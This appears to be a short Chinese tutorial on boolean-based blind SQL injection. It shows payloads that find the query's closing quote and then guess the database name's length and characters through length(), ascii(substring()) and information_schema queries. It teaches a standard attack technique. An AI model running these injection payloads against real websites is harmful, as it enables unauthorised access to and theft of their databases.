基于布尔型的注入(盲注)

网页没有回显,只会在sql语句执行错误时,全部显示一个错误页面,通过错误回显,测试sql语句是否正确。

一、找到数据库语句的闭合符号

通过变换' " ') ") - 等找出闭合的符号。
?id=2' and 0  --+ 返回错误
?id=2' and 1  --+ 返回正确

二、通过显示不同,判断语句是否执行正确。猜测库名,表名,字段名。

?id=2' and (select length(database()))>10   猜测要查询语句的长
?id=2' and (select ascii(substring(database(),1,1)))>96  猜测要查询第一个字母的ascii码
?id=2' and (select ascii(substring(schema_name,1,1)) from information_schema.schemata limit 0,1)>100  猜测数据库名的第一个字母的ascii码

发表评论

电子邮件地址不会被公开。 必填项已用*标注